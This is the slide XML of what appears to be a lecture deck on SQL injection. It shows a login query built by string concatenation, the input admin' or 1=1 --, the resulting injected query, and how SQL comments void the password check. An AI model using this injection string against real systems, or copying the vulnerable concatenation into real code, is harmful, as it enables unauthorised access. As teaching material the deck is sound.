                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		   from members where ";</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r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +  "’ and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =’"  + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + "’";</a:t>
            </a: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a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="888871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13BD-CFE3-4305-8778-50E63CB47153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We get</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F83EEE5-A1D9-42DC-82B7-6FA736429007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = admin’ or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sPassword</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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_level</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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 from members</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘admin’ or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2713568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13BD-CFE3-4305-8778-50E63CB47153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We get</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F83EEE5-A1D9-42DC-82B7-6FA736429007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = admin’ or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sPassword</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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_level</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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 from members</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘admin’ or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Oval 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F796F06-6B49-46C5-892E-CD46878EB5A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7431315" y="3579587"/>
            <a:ext cx="551543" cy="5293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038866B-03F7-4BBC-B190-F1BB4C30F861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="4" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7707087" y="2496457"/>
            <a:ext cx="0" cy="108313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8C34F2F-83F2-4DC5-A895-F0F20BF68B7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373261" y="1828806"/>
            <a:ext cx="691215" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>??</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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999180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B08B-A2A3-4145-8139-8904A8CA624A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Comments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2640AE74-7474-4B97-9609-37328C8CC558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single line comments start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any text between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and the end of the line will be ignored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_level</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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 from members</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘admin’ or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =‘’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1787316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B08B-A2A3-4145-8139-8904A8CA624A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Comments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2640AE74-7474-4B97-9609-37328C8CC558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single line comments start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any text between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and the end of the line will be ignored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 from members</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="75000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>member_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
